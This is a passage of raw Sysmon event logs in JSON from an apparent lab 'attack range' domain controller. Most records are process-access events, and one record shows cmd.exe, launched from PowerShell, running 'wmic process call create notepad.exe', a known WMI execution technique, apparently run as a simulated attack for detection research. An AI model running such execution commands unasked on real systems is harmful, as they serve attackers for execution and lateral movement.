C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5426,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5427,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-00108FD30800}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-00108FD30800}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5428,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-00108FD30800}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-00108FD30800}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5429,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.305\r\nProcessGuid: {41C8662E-20D6-5F25-0000-001062D40800}\r\nProcessId: 2788\r\nImage: C:\\Windows\\System32\\wbem\\WMIC.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: wmic  process call create notepad.exe \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E\r\nParentProcessGuid: {41C8662E-20D6-5F25-0000-00108FD30800}\r\nParentProcessId: 5068\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process call create notepad.exe\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.305","ProcessGuid":"{41C8662E-20D6-5F25-0000-001062D40800}","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"WMI Commandline Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"wmic.exe","CommandLine":"wmic  process call create notepad.exe ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E","ParentProcessGuid":"{41C8662E-20D6-5F25-0000-00108FD30800}","ParentProcessId":"5068","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process call create notepad.exe\" ","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5430,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-20D6-5F25-0000-00108FD30800}\r\nSourceProcessId: 5068\r\nSourceThreadId: 4936\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001062D40800}\r\nTargetProcessId: 2788\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-20D6-5F25-0000-00108FD30800}","SourceProcessId":"5068","SourceThreadId":"4936","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001062D40800}","TargetProcessId":"2788","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5431,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001062D40800}\r\nTargetProcessId: 2788\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001062D40800}","TargetProcessId":"2788","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5432,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5433,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5434,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 